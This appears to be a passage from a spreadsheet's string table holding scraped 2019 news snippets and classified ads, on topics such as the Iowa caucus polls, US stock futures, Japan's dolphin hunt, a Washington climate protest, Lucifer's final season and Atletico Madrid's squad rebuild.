announced last week that it would add 60 new staff members and open 10 new offices, and she plans to return weekly until Halloween. Her campaign manager told reporters she was aiming for a “top three” finish in the state. The historically large field has left even the candidates unclear about how many Democrats will have a plausible claim to continue on to New Hampshire, Nevada and South Carolina. Ms. Harris called a third place showing a goal but said she did not know if a failure to meet that threshold would doom her campaign. “I honestly don’t know,” she said in an interview before a campaign stop on Friday in Cedar Falls. “I think it will be a confluence of factors that ultimately decides how long anyone stays in and what that means.” A new poll from The Des Moines Register and CNN, released on Saturday night, showed a reordering of the Democratic field. For the first time in The Register’s poll this year, Ms. Warren, of Massachusetts, at 22 percent support, led Mr. Biden, who the survey found was the first choice of 20 percent of would-be caucusgoers. Mr. Sanders, of Vermont, placed third, at 11 percent, with Mr. Buttigieg at 9 percent and Ms. Harris at 6 percent. “This is the first major shake-up” of the race, The Register’s pollster, Ann Selzer, told the paper. The poll found that just one in five likely caucusgoers said they had made up their minds, and 63 percent could still be persuaded to shift their support to someone else. Ms. Klobuchar, of Minnesota, who was tied for sixth in the poll, said after presiding over the opening of a new campaign office on Friday in Cedar Rapids that there might be more than twice as many tickets out of Iowa as usual. “You could be No. 6,” Ms. Klobuchar said before the poll results were announced. “I’m really serious, in a 20-person field and people will go, ‘Not bad.’ They’re going to look at who is in the top eight.” Mr. Buttigieg predicted a smaller number of candidates would survive Iowa. “I don’t know how many people can emerge, I think that comes down to how many people voters can keep track of,” he said. “I’d be shocked if it’s more than five.” At the moment, all of the Democratic candidates are chasing Ms. Warren. She is drawing the largest crowds in the field — 2,000 came to see her on Thursday night in Iowa City, two hours after and three miles away from a stop by Ms. Harris in Coralville that drew about 200 to a brewery. Ms. Warren declined on Sunday to take a victory lap over her new Iowa polling standing. “I don’t do polls,” she said in Detroit, where she marched with striking autoworkers outside a General Motors plant. “We are still months away from the Iowa caucuses and the first primary elections.” A cadre of challengers to Mr. Biden and Ms. Warren are augmenting their Iowa operations, adding staff, opening new offices, collecting endorsements and starting new fund-raising appeals as they aim to create the aura of momentum while building organizations to turn out supporters for the state’s Feb. 3 caucuses. Ms. Klobuchar, from neighboring Minnesota, has support from more current and former Iowa state lawmakers than any other 2020 presidential candidate, according to Iowa Starting Line, a local political news website. And Senator Cory Booker of New Jersey, who tied with Ms. Klobuchar in The Register’s poll, issued an S.O.S. to supporters over the weekend, saying that without an infusion of $1.7 million by the end of the month his campaign might no longer be viable. While Democrats elsewhere in the country, representing a national party that is increasingly diverse, offer quadrennial grumbling about Iowa, officials here aim to use their status to force the presidential candidates to focus on local issues. J. D. Scholten, a Democrat running for the seat held by Representative Steve King in a 39-county section of northwest Iowa, said he will soon schedule campaign stops across his district with each of the presidential campaigns in towns of 1,000 people or less to test their appeal to rural voters. “I really want to see the engagement,” Mr. Scholten said at the steak fry on Saturday, which drew a crowd of more than 12,000 people. “I think that’s where I’ll see. No polling can tell me, nothing like that. I want to see whether the people’s heads nod or not.” Lisa Lerer contributed reporting from Cedar Rapids, Iowa, and Stephanie Saul from Detroit. Source link</t>
  </si>
  <si>
    <t>5 Locations Dartmoor 5 Locations Dartmoor - I love spending time photographing on the west side of Dartmoor, Devon, and share my 5 favourite locations for landscape photography. Dartmoor NationalContinue reading The post 5 Locations Dartmoor appeared first on Scottish Landscape Photography.</t>
  </si>
  <si>
    <t>The alleged fraudulent trading practices at JPMorgan generated "tens of millions of dollars of losses" for its customers, say officials.</t>
  </si>
  <si>
    <t>A POTENTIALLY hazardous asteroid barrelling through space at more than 32,000mph will approach the Earth incredibly close this weekend, space agency NASA has discovered. The post NASA asteroid alert: An 853FT space rock is rapidly approaching Earth at 32,000MPH appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Thousands gathered in June 2018 to demand the release of the ex-English Defence League leader from prison. Read more? Click here</t>
  </si>
  <si>
    <t>We take a look at the key issues ahead of the cut-throat semi-final at the MCG on Friday night.</t>
  </si>
  <si>
    <t>Based on the performance of the Dow Futures, the Dow Jones is expected to open at close to 27,000 points, swiftly reversing what could have been a steep downtrend in the U.S. stock market following the submission of an impeachment inquiry by the Democratic Party. Dow Futures show that the Dow Jones is expected to open at around 27,000 points, reversing stock market downtrend (source: Yahoo Finance) The Dow Futures soared after various reports suggested that the U.S. and China are set to hold trade talks on October 10, reigniting the sentiment around a potential partial trade deal with China. Dow Jones has potential to reach record highs again As said by strategists including Jim Reid at Deutsche Bank, the trend of the global stock market is currently heavily dependent on the direction of the trade talks between the U.S. and China. Positive progress from the trade talks in October, which historically has been a needle-moving month for the U.S. stock market, could further fuel the momentum of the Dow Jones heading into 2020. “The direction in markets at the moment is either dictated by trade, the impeachment drama or a combination of both,” said Reid. An overall increase in the sentiment around the U.S. stock market and the recovery of the Dow Jones has led to a slight pullback in the safe haven market, as the prices of commodities like gold stabilized. The decline in the demand for safe-haven assets in recent weeks compared to July and August indicate that investors are becoming increasingly confident in re-entering the stock market. “Gold is smack bang in the middle of its longer-term $1,480.00 to $1,530.00 range. It looks set to remain anchored there for the session as markets await more big picture clarity,” said Jeffrey Halley, an analyst at OANDA. The anticipation of a trade deal between the U.S. and China has risen noticeably as of late due to the slowing growth rate of the Chinese economy and the goodwill gestures demonstrated by both sides in pushing back the imposition of tariffs prior to the October trade talks. At the U.N. General Assembly on Wednesday, U.S. President Donald Trump said that China wants to badly make a deal with the U.S., stating that a deal could happen sooner than investors expect, which if materialized, would reflect on the Dow Jones in the short term. However, journalists in China such as Hu Xijin, the editor-in-chief of the Chinese and English editions of the Global Times, said that China is not anxious to reach a deal despite the projected decline in the Chinese economy’s growth. Xijin said: “Both China and the US should cherish the current talks. Many US officials easily misread China’s goodwill, think it shows Beijing’s weakness. China doesn’t like talking tough before the negotiations, but I know China is not as anxious to reach a deal as the US side thought.” China and the U.S. both have stated that the trade dispute has caused damage that could have been avoided and in that regard, both countries have enough incentives to reach a deal before the year’s end. What happens if a deal is reached With the Dow Jones still hovering at its record high, a trade deal following the approval of the Federal Reserve of an interest rate cut in September could send the Dow Jones to new all-time highs, relieving most of the pressure on the global economy by eliminating geopolitical risks. A trade deal would critically lead to the recovery of the manufacturing sector of the U.S., which has entered into a recession in recent months. Some have stated that the recession of the manufacturing sector may not be as heavily affected by the trade dispute, with a JP Morgan analyst stating that the build up of inventory has played a key role in slowing down the growth of the manufacturing sector globally.</t>
  </si>
  <si>
    <t>Japan’s annual dolphin hunt, which sees them slaughtered in shallow waters, has started in the small coastal town of Taiji. The hunt, which will last for around six months, sees fishermen herd the dolphins and small whales into a cove. They then seal the area with a net and most of the creatures are killed with knives for their meat. Others are sold on to aquariums and marine parks. The practice has drawn criticism from animal-rights groups in Japan and across the globe. Criticism Protesters hold dolphin-shaped ballons and anti-dolphin slaughter placards as they march to the Japanese embassy (Photo: Getty) Earlier in the year, activists in Japan launched a legal action in an attempt to block the hunt. The Japanese government, has in the past defended the hunt insisting it is a “form of traditional fishing” in Japan. According to the Dophin Project, a charity which campaigns for the protection of the species, the fishermen push a sharp metal spike into the dolphins’ necks just behind their blowholes. This is supposed to sever the spinal cord and produce an instant “humane’ death. The fishermen then push wooden corks into the wound to prevent their blood from spilling into the cove. Activists Read more: How our appetite for Japanese dishes has grown over 20 years as dishes have been adapted Officials in Taiji were said to be anxious that animal rights activists might attempt to disrupt the start of this year’s dolphin hunting season, as in previous years, according to Kyodo News agency. However, only around 10 members of a Japanese animal rights group gathered at the port and the first boats set off from the port without obstruction on Sunday. The start of the hunt comes as Japan resumed catching whales for profit despite widespread international criticism. Its departure from the International Whaling Commission (IWC) on 30 June allowed the resumption of commercial whaling in July for the first time in 31 years. Waters red with blood The 2019/2020 hunting season in Taiji will aim to kill 1,749 whales, dolphins and porpoises, including 6 species of dolphin and three species of whale. The annual dolphin hunt gained global interest following the Oscar-winning documentary 2010 documentary The Cove. It filmed the slaughter of the dolphins, so many, that they turned the waters of the cove red with blood. More on environment Climate change means the Great Barrier Reef's outlook is 'very poor' After UK's biggest earthquake caused by fracking — what next? How not buying new clothes can feel empowering UK fracking site near Blackpool records largest ever earth tremor UK rivers 'are being used as open sewers', charity warns Lavender under threat from diseases — but Instagram fans could save it The post Japan begins annual hunt to slaughter dolphins in shallow waters appeared first on inews.co.uk. The post Japan begins annual hunt to slaughter dolphins in shallow waters appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>In Japan, tattoos are associated with the mafia, so the Wallabies are paying their respects by covering up in local baths.</t>
  </si>
  <si>
    <t>Want climate news in your inbox? Sign up here for Climate Fwd:, our email newsletter. WASHINGTON — Climate activists had pledged to bring the nation’s capital to a standstill Monday morning. That did not quite happen, but the blockades of major intersections, street dances and a smattering of arrests continued the effort by protesters to raise the profile of climate change as a political issue. Monday’s protests followed Friday’s demonstrations by millions of young people around the world, who sought in marches and rallies to pressure policymakers to take action on climate change. The “Strike D.C.” protest is timed to coincide with the appearance at the United Nations of 16-year-old climate activist Greta Thunberg and other young people, who will urge world leaders to enact aggressive policies to curb the planet-warming greenhouse gas emissions. Such emissions, scientists say, are already raising sea levels, strengthening storms and increasing droughts and food shortages. The coalition of 14 environmental and social justice activist groups that took to the streets of Washington want to go further than the students who marched last week, some of whom will speak on Monday at the United Nations. The activists, who are demonstrating without permits, are disrupting rush-hour traffic near the White House, the Capitol, the National Mall and other choke points with the intention of creating gridlock and mayhem. Many said they expected to be arrested. By 8 a.m., a group of about 100 protesters had parked a bright yellow sailboat on a busy intersection on K Street, the capital of corporate lobbying. Police sirens blared as protesters played drums and danced in the streets. Commuter buses stopped and their passengers got off and started walking a block from the White House, and drivers stood in the shutdown street and calmly watched the protesters. But they were up against a police force and Secret Service that are experienced at shutting down protests. “It will be a different type of action than Friday’s protests,” said Kathleen Brophy, an event organizer with the environmental group 350.org. “We will not have permits. We will be engaging in civil disobedience. We are withholding our obedience from a system we do not agree with.” On Capitol Hill, as about 30 protesters chanted, Capitol Police officers arrested six protesters who had linked arms and blocked westbound traffic outside of the Department of Health and Human Services. The group was led by Black Lives Matter, and as the police moved in to make arrests and place zip-ties around protesters’ wrists, others held banners on the sidewalk and chanted, “Climate justice, it matters here. Black lives, they matter here.” “There is definitely an expectation that we will need money for bail,” said Kaela Bamberger, a spokeswoman for Extinction Rebellion U.S., one of the groups organizing the protest. Extinction Rebellion is considered to be among the best-funded activist groups in the world, boasting numerous celebrity funders. Earlier this year, the band Radiohead released a cache of recordings made while working on their hit 1997 album OK Computer, and announced that all proceeds from the sales would go to Extinction Rebellion. A spokeswoman for the Capitol Police said that after the six arrests, the protesters had cleared the area. As some protesters stood and chanted, others handed out fliers to the drivers willing to roll a window down. Nee Nee Taylor, with Black Lives Matter DMV (the widely used shorthand for the Washington region, the District of Columbia, Maryland and Virginia), addressed the crowd, where one sign said, “Monday can wait. The climate can’t.” Azani Creeks, 22, who recently moved to Washington for work after graduating from the University of Southern California, said she appreciated that Monday’s protest featured members of so many different groups. Even so, she wasn’t sure their plans to shut down traffic would change many minds. “I don’t think this action will convince people one way or another, but they’ll at least know that we care and are doing something about it,” Ms. Creeks said. But it was unclear whether key policymakers would take note of the action. President Trump is in New York, attending the opening of the United Nations General Assembly. The House of Representatives will not be in session, and many senators are unlikely to arrive at the Capitol before 4:30 p.m., at the chamber’s only scheduled vote of the day. On Capitol Hill, some onlookers cheered the protesters, others rubbed their temples. Many people walking to work took pictures of the protesters, as did construction workers on nearby scaffolding. Closer to the White House, other onlookers said they didn’t mind the protests. “I am supportive of the disruption,” said Autumn Banner. “It disrupts the commuters, but I’m taking the Metro regardless.” Source link</t>
  </si>
  <si>
    <t>Johnsburg graduate Kimmy Hammond had 26 digs and two aces for McHenry County College’s women’s volleyball team in a 25-14, 25-15, 25-27, … The post Women’s college volleyball: McHenry County College comes up short against Waubonsee appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>Lucifer season 5: How does Tom Ellis really feel about Netflix cancellation? | TV &amp; Radio | Showbiz &amp; TV Original Source Lucifer season four is available to stream and download on Netflix now. Welsh actor Tom Ellis stars as Lucifer Morningstar, the lord of Hell who arrived on earth to work for the LAPD and run his own nightclub. Ellis has been part of the show since it first aired in 2016 but how does he really feel about season five being the last? How does Tom Ellis really feel about Netflix cancellation? Lucifer originally aired on Fox in the US, before the network cancelled the show in May 2018 after three seasons. After a huge campaign to save the show from Lucifer fans, Netflix picked up the series, renewing the show for two more seasons. In June, Netflix announced that season five would be the last series of Lucifer. Filming for the final series begun at the end of August and it is sad to say, Tom Ellis was definitely emotional about filming the last season. WILL MAZE FACE A NEW VILLAIN IN SEASON 5? Speaking at a Lucifer fan convention in LA, Ellis said: “I can categorically say that I will never have another experience like this. When they call cut on the last day, it’s going to be a lot to take in.” Ellis has previously spoken about how surprised he was to see fans campaigning to save the show after it had been cancelled. He said: “These days there is so much TV, so much content out there. To be on a show that gets noticed, that people know about, that just seems like a massive achievement these days. “You guys don’t know about all of this but we’ve been up against it quite a lot. We’re like the b*****d child. “We wouldn’t have known how popular the show was until we got cancelled. That was the crazy thing about it. We didn’t know that there was all that love out there.” STAR OPENS UP ABOUT A LUCIFER SEASON 6 What will happen in the final season of Lucifer? As there will be no sixth season, the upcoming series will have an additional six episodes and the final season will be split into two parts. This means Lucifer fans will be treated to 16 episodes in total. At the end of season four, Lucifer was sent back to hell and it unknown if his sidekick Maze went with him. The final series may see Chloe (played by Lauren German) and co. venture to hell to bring Lucifer back to earth, but the details of the final season are being kept under wraps. One thing we do know is Maze will face a brand new enemy in season five after actress Lesley-Ann Brandt dropped a huge hint. WHAT HAPPENED TO BABY CHARLIE? Brandt posted a photo of herself dressed Maze, standing next to her stunt double who was also dressed exactly the same. She captioned the photo: “Double the demon with my girl @NeeshNation helping Maze kick ass since season three. Fun fact, this dope queen doubled Halle in John Wick #eyesup @LuciferNetflix.” Speaking to Entertainment Weekly, Lucifer showrunners Ildy Modrovich and Joe Henderson opened up about the final season. On Lucifer’s return to Earth, Henderson explained: “We have a lot of exciting ways [to bring him back], and one way, in particular, to do it that launches an awesome, awesome season five. “We did spend some time digging into what we think can be season five. We even have the first scene [of season five], which is one of my favourite things we’ve ever come up with [laughs].” Modrovich added: “If everybody is speculating on one thing, we just try to think as a bats**t as we can, as outside of the box as possible, so that people don’t get bored, so we don’t get bored. “We do have an idea. It’s an idea that when it came up in the room, we went, ‘Oh god, that’s crazy.’” Lucifer season 4 is streaming on Netflix now.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Lucifer season 5: How does Tom Ellis really feel about Netflix cancellation? | TV &amp; Radio | Showbiz &amp; TV appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>A £200 funding package has been unveiled by the government to pay for new cancer scanners in a drive to tackle the “cruel disease”. Read more? Click here</t>
  </si>
  <si>
    <t>Mum from Great Notley used art to get her through depression Original Source A MUM-OF-TWO has used her passion for art to help get her through difficult times. Lisa Ray, of Great Notley, suffered a bout of depression last year and began sketching to take her mind off things. She paints all of the artwork, which is original, in her dining room. She is working hard to save for a studio in her garden. Lisa said she found sketching to be a good source of therapy. It was from then on she realised she wanted to spend the rest of her like making art and began to grow her business. She said: “It’s surprising how quickly it has taken off, I have gained interest locally and I have some pieces up in Square1 restaurant in Great Dunmow. “I also enjoy doing bespoke pieces for people. I recently did one for a lady in Bournemouth who has a beautiful home.” She has suffered with anxiety and depression all her life and uses painting as a way to relax. She is encouraging others to do the same. She said: “Life kind of got in the way, I got a job in the City and my art fell aside, then I had kids and got married, but I always has a passion for being creative.” Lisa is an advocate for showing it’s never to late to follow your passion.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Mum from Great Notley used art to get her through depression appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Luc Van Damme was two when taken from his Rwandan mother under a colonial ban on mixed families. The post The mixed children Belgium took from their mothers under colonial rule appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>We have a big scale location for cannabis growing in west of London, ON We are looking for master grower. Any possible offers : paid by hour or by performance, long term contract, partnership benefits shared etc… Please send your qualificati.. Read more</t>
  </si>
  <si>
    <t>New agent Desi (Levy Tran) arrives in the world of MacGyver with a bang this week.</t>
  </si>
  <si>
    <t>A police force is hiring 15 civilian staff to handle the volume of fines it expects to issue to motorists caught infringing rules on new “smart” sections of motorway. A report by Thames Valley Police found that each speed camera on modified sections of the M4 and M40 due to open later this year will capture 30,000 “infringements” per annum. The figures, reported by the Mail on Sunday, suggest that each camera on the new smart motorway stretches will generate £600,000 in fines each year. There are already some 200 miles of smart motorway in operation across the UK. The roads allow motorists to use the hard shoulder some or all of the time to increase capacity and reduce congestion while regulating speed using variable speed limits. £100 fine and three penalty points Motorists who exceed the speed limits or stay in a lane marked with a red “X” on an electronic overhead gantry sign can expect a £100 fine and three penalty points if they are recorded by one of the speed cameras. The scheme is overseen by roads agency, Highways England. The Thames Valley Police report said: “It is anticipated that the M40 and M4 will each capture 30,000 infringements per year. The national equation used by Highways England has shown that an increase of 15 [staff] will be required to deal with the 500 captures per camera per month, funded by Highways England.” The smart system has proved controversial, with campaigners calling for the scheme to be scrapped after four fatal accidents on one stretch of the M1. Efficiency Motoring organisations questioned the efficiency of the system and called for income generated by the fines to be spent on improving roads. Edmund King, president of the AA, said: “If more resources were put into making the gantry signs accurate and the variable speeds right for the conditions, you might not need more resources for enforcement. “Any ‘income’ from fines should go into making these roads safer by sorting technology and doubling the number of lay-bys.” More police Domestic violence killings in the UK hit highest level in five years Open schools every day and have police as security, commissioner says Police boss criticises Boris Johnson for using officers as a backdrop Notting Hill Carnival: Officers told not to dance with revellers Lucas Dobson: Body found in search for missing 6-year-old boy Police chief urges public to 'lend hand' rather than filming officers The post Police force to hire extra staff to process fines from speed cameras on ‘smart’ motorways appeared first on inews.co.uk. The post Police force to hire extra staff to process fines from speed cameras on ‘smart’ motorways appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/09/18/eyeview-new-ceo/ Video ad company Eyeview names Rob Deichert as its new CEO After 13 years at the helm of video advertising company Eyeview, founder Oren Harnevo is stepping down as CEO. The company’s new chief executive is Rob Deichert, who was most recently COO at digital advertising company 33Across. The company is also announcing two other new hires — Sean Simon as senior vice president of sales and Risa Crandell as vice president of sales. Harnevo, meanwhile, will remain on Eyeview’s board of directors. “It’s been a long and incredible ride for the last 13 years since I co-founded Eyeview, and I feel it’s time to let a new leader help propel Eyeview to its next chapter,” he said in a statement. “2019 has been a great year for Eyeview. With strong revenue growth, and seasoned additions to our leadership team, it’s the perfect time to bring on [ad] industry veterans like Rob, Sean and Risa to accelerate our business as I depart to work on my next venture while supporting Eyeview on the board of directors.” Deichert acknowledged that it can be challenging to step into the shoes of a company’s founder, but he said he consulted with Harnevo before taking the job. “I was just emailing with him today,” he added. “He’s going to be a great partner going forward.” Rob Deichert Deichert also said he has a standard on-boarding process when he joins a new company, which involves holding 30-minute, one-on-one meetings with every single person. (In this case, that means holding nearly 100 meetings.) And while Eyeview has been around for more than a decade, Deichert suggested that there’s still plenty of room for its “outcome-based video marketing” (its specialty is video ads that are personalized based on viewer data) to grow. In particular, he predicted that as direct-to-consumer brands are “maxing out on Facebook,” they’ll start turning back to traditional ad channels like television. With Eyeview, they can do that without losing the measurement and customization of online video. Eyeview Brings Its Personalized Video Ads To Internet-Connected TVs Source: https://techcrunch.com/2019/09/18/eyeview-new-ceo/ The post Video ad company Eyeview names Rob Deichert as its new CEO appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>SINGAPORE, Sept. 3, 2019 /PRNewswire/ -- The UAE's Abu Dhabi Commercial Bank (ADCB) has digitised trade finance for its customers using the Singapore-based dltledgers Blockchain platform. ADCB today reported completion of its first live end-to-end trade in Blockchain, moving cross-border goods for Western Red Spring Canadian Wheat worth USD 6.5m (AED 25m), from Canada to Bangladesh. ADCB is the first bank in UAE to run the end-to-end Blockchain trade finance transaction with full document automation through the dltledgers platform, offering corporate customers efficiencies and faster access to cash." data-reactid="11"&gt;SINGAPORE, Sept. 3, 2019 /PRNewswire/ — The UAE’s Abu Dhabi Commercial Bank (ADCB) has digitised trade finance for its customers using the Singapore-based dltledgers Blockchain platform. ADCB today reported completion of its first live end-to-end trade in Blockchain, moving cross–border goods for Western Red Spring Canadian Wheat worth USD 6.5m (AED 25m), from Canada to Bangladesh. ADCB is the first bank in UAE to run the end-to-end Blockchain trade finance transaction with full document automation through the dltledgers platform, offering corporate customers efficiencies and faster access to cash. Krishnakumar Duraiswamy, ADCB's Group Head of Trade Finance said, "By joining the fastest growing dltledgers Blockchain platform for cross-border trade, the Bank is able to re-imagine trade finance for its customers. This private network allows ADCB to service corporate customers in real time, increasing transparency and building cross-border interconnectivity."" data-reactid="12"&gt;Krishnakumar Duraiswamy, ADCB’s Group Head of Trade Finance said, “By joining the fastest growing dltledgers Blockchain platform for cross-border trade, the Bank is able to re-imagine trade finance for its customers. This private network allows ADCB to service corporate customers in real time, increasing transparency and building cross-border interconnectivity.” Islami Bank (Bangladesh), SGS Surveyor, Richardson International Shipping Canada, Banjo Auto Flour Mill Bangladesh and Agrocorp, a large Singapore-based trading house." data-reactid="13"&gt;ADCB’s private network provided end-to-end trade visibility across the entire life cycle of the transaction with authenticated and consented digitized documents at every step. This pioneering transaction involved several trade partners: Islami Bank (Bangladesh), SGS Surveyor, Richardson International Shipping Canada, Banjo Auto Flour Mill Bangladesh and Agrocorp, a large Singapore-based trading house. Nitin Jain, Head of Treasury &amp; Capital Markets, Agrocorp International commented on dltledgers technology, said, "We could potentially reduce our financing costs by at least 15-20% through dltledgers technology, saving significantly on the costs of physically moving documents. Moving onto the electronic system, we are also able to access earlier financing from banks as the documentation flow is much closer to real-time."" data-reactid="14"&gt;Nitin Jain, Head of Treasury &amp; Capital Markets, Agrocorp International commented on dltledgers technology, said, “We could potentially reduce our financing costs by at least 15-20% through dltledgers technology, saving significantly on the costs of physically moving documents. Moving onto the electronic system, we are also able to access earlier financing from banks as the documentation flow is much closer to real-time.” The flow mirrors the traditional letter of credit process, involving agreeing the terms, the application, the issuance, the advising, the amendment request and its approval, the document presentation, the discrepancy resolution, and the bill settlement instructions. The efficiencies stem from using a single Blockchain network for all participants, instead of relying on multiple systems. As global trades intertwine and evolve, demands for a networked and collaborative model will intensify. Not only do transactions need to be seamless and safe, clients are increasingly looking for innovative solutions that save them time and costs. Using the dltledgers platform, ADCB is able to offer its corporate customers greater confidentiality, the ability to keep a closer tab on the flow of the goods and documentation, faster turnaround, and enhanced fraud prevention. Middle East and Africa. We have over 400 global traders running 3600 live trades and over one billion USD trade financing performed with more than 30 banks globally. We are very bullish of our partnership with ADCB and the region. The growth and sustenance of the global US$8 trillion open account trade finance market are heavily reliant on the easy availability and robustness of financing mechanisms. Considering that trade finance is widely viewed as the fuel for global commerce, it is easy to see why customer-centric Blockchain platforms like ours is dominating conversations in the trade finance world. We will continue to grow and expand."" data-reactid="17"&gt;Mr Samir Neji from dltledgers said, “We are extremely delighted to work with ADCB to support their trade finance digitisation through the dltledgers platform. We have huge demand for our network from our 50+ traders signed in from UAE and hence our plan to expand into Middle East and Africa. We have over 400 global traders running 3600 live trades and over one billion USD trade financing performed with more than 30 banks globally. We are very bullish of our partnership with ADCB and the region. The growth and sustenance of the global US$8 trillion open account trade finance market are heavily reliant on the easy availability and robustness of financing mechanisms. Considering that trade finance is widely viewed as the fuel for global commerce, it is easy to see why customer-centric Blockchain platforms like ours is dominating conversations in the trade finance world. We will continue to grow and expand.” About dltledgers: Singapore as its HQ. We are a customer centric platform for cross-border trade execution. Several regional and global banks have signed up and operate as network partners in offering trade financing services in the platform. Apart from counter party assignment in Blockchain, we network shipping, logistics, ports and other network partners into a trusted trade network for our customers." data-reactid="19"&gt;dltledgers is a global platform company with Singapore as its HQ. We are a customer centric platform for cross–border trade execution. Several regional and global banks have signed up and operate as network partners in offering trade financing services in the platform. Apart from counter party assignment in Blockchain, we network shipping, logistics, ports and other network partners into a trusted trade network for our customers. -border trade is being transformed like never before. dltledgers Blockchain platform leads the pack with over 400+ global traders, USD 1 billion+ trade executed across 30+ banks and a wider network which is growing on a global scale." data-reactid="20"&gt;With digitisation and Blockchain, Cross–border trade is being transformed like never before. dltledgers Blockchain platform leads the pack with over 400+ global traders, USD 1 billion+ trade executed across 30+ banks and a wider network which is growing on a global scale. Story continues Each step in executing cross-border trade may involve dozens of documents, contracts, movement of moneys and complex supply-chain. A lot of aspects of the business is performed across multiple parties with loose relationships. It’s natural that the process is mired with issues like mistrust, failed promises, and inefficiencies in several aspects of contracts, finance, goods mismanagement, and fraud. Our customers benefit from our Blockchain innovation in 12 core modules and 68 code bases, which resolves and builds a trusted trade network for private, permissible and secure trade. About ADCB: ADCB Group is a leading UAE banking group that provides a full suite of award-winning products and services, spanning Consumer Banking, Wholesale Banking, Treasury &amp; Investments and Property Management. 1 May 2019, ADCB and Union National Bank merged and the combined entity acquired Al Hilal Bank, which operates as a separate Islamic banking entity under its own brand within the Group. The transaction reinforced ADCB's position as the third largest bank in the UAE, with assets of AED 417 billion based on pro-forma financial information as at 30 June 2019." data-reactid="28"&gt;On 1 May 2019, ADCB and Union National Bank merged and the combined entity acquired Al Hilal Bank, which operates as a separate Islamic banking entity under its own brand within the Group. The transaction reinforced ADCB’s position as the third largest bank in the UAE, with assets of AED 417 billion based on pro-forma financial information as at 30 June 2019. Abu Dhabi through the Abu Dhabi Investment Council, trades on the Abu Dhabi Securities Exchange (ADX) under the ticker of ADCB. As at 30 June 2019, ADCB's market capitalisation was AED 58 billion." data-reactid="29"&gt;The Group serves over 1 million customers. ADCB Group, which is 60.2% owned by the Government of Abu Dhabi through the Abu Dhabi Investment Council, trades on the Abu Dhabi Securities Exchange (ADX) under the ticker of ADCB. As at 30 June 2019, ADCB’s market capitalisation was AED 58 billion. Al Hilal Bank can be found at beyondambition.com" data-reactid="30"&gt;Further information on ADCB can be found at adcb.com and information on the transaction between ADCB, UNB and Al Hilal Bank can be found at beyondambition.com http://www.prnewswire.com/news-releases/adcb-launches-real-time-trade-finance-for-customers-on-dltledgers-blockchain-platform-300910397.html" data-reactid="42"&gt;View original content:http://www.prnewswire.com/news-releases/adcb-launches-real-time-trade-finance-for-customers-on-dltledgers-blockchain-platform-300910397.html</t>
  </si>
  <si>
    <t>A fire on Sydney’s north shore has destroyed a family's home and caused nearby properties to be evacuated.</t>
  </si>
  <si>
    <t>I am looking for a weekend job. I am 35 years old, reliable and hardworking, I am in good shape and willing to do any task. I am very much in need of some extra money after unexpected expenses and time off work. I have been working in construction for around 15 years, but I .. Read more</t>
  </si>
  <si>
    <t>elmacho</t>
  </si>
  <si>
    <t>Was keeping an eye on this one for my son. Price not only dropped recently, but with code get an extra 20% off. Pity about the movie. Original Coupon Deal</t>
  </si>
  <si>
    <t>Nicole Pedersen-McKinnon</t>
  </si>
  <si>
    <t>Seeking out a free counsellor can be the first step in overcoming financial hardship and stress</t>
  </si>
  <si>
    <t>The Current State of Atletico Madrid’s Rebuild MADRID, SPAIN – JUNE 01: A general view (GV) of Wanda Metropolitano ahead of the UEFA Champions League Final between Tottenham Hotspur and Liverpool at Estadio Wanda Metropolitano on June 1, 2019 in Madrid, Spain. (Photo by Charlotte Wilson/Offside/Getty Images) Diego Simeone embarks on a journey to build another world-class squad that can challenge for major honours. With the highest number of transfers amongst top clubs in Europe, here’s how Atletico Madrid‘s rebuild has gone so far. Looking at Atletico Madrid’s Rebuild Keeping Diego Simeone Diego Simeone is one of Europe’s top managers. He’s won the Europa League twice and been in two Champions League finals. Domestically, he’s won the league and the Copa Del Rey. However, Simeone’s greatest achievement is getting Atletico Madrid into relevance amongst the biggest clubs in Europe. His project started with signing tough, competitive players and curating a fighter’s mentality within the squad. It was this mentality that broke the duopoly of Barcelona and Real Madrid in La Liga as Atletico won the league at Nou Camp in 2014. The Argentine has garnered interest from top clubs across Europe ranging from Arsenal to Inter Milan. Arsenal were interested in him as Arsene Wenger’s time was coming to an end while Inter have a special relationship with Simeone since his playing days at the San Siro. Atletico have done a tremendous job in keeping their legendary manager at the club as they adapt to a new stadium and revitalize the squad with a rebuild. The Departures Atletico have always had a solid spine to base their team around. This spine had some world-class talent in all areas of the field. Diego Godin marshalled the defence for almost a decade and his most recent partner, Lucas Hernandez, is also a World Cup winner. Both defenders have moved on as Godin looks to finish his career at Inter Milan and Hernandez has made a big-money move to Bayern Munich. Their most trusted full-backs – Juanfran and Felipe Luis – are also on the way out. Rodri Hernandez, the most metronomic presence in midfield, has moved to Manchester City as they looked for a replacement for Fernadinho. Atletico have also moved on flop signing Gelson Martins to AS Monaco after his loan move was made permanent. They’ve also sold Luciano Vietto to Sporting CP in Portugal. Their most significant departure is Antoine Griezmann who scored nearly a century of goals in his five years at the club. His departure has both footballing and commercial implications for the club. The impact of such an exodus is obvious on any project, but Atletico seems to have a clear plan on repairing the squad. The Arrivals Atletico’s rebuild will include strengthening in all areas of the field. They have the money to do so, with more than £250 million being generated from sales. The problem they face is that of clubs having knowledge of their large cash reserves. However, they’ve made some astute signings already. In signing Joao Felix for a club-record fee, they look to make him the next Antoine Griezmann as both players occupy similar spaces on the field. Felix also imitates the Frenchman in being more than a goalscorer. He drops deep to create and plays off a central, more traditional frontman. His performances will be key to Atletico’s new project. Atletico look to supplement Felix with the creativity of James Rodriguez from city rivals Real Madrid. They’ve stepped up their chase for the Colombian as Napoli have cooled off their interest in him. The ‘Rojiblancos’ have made the transfer of Alvaro Morato permanent from Chelsea, adding numbers in attack. However, the club’s key recruitment has been at the back, and these players will be crucial as Simeone will build the foundation of the team from the defence. The club has signed former Porto players Felipe and Hector Herrera, with the latter coming in as a free transfer. Both players were key in Porto’s run to the Round of 16 in the Champions League last season and have experience at a high level. Atletico seem to be doing a lot of business with Real as they sign La Fabrica graduate Marcos Llorente. The player seems a perfect fit for 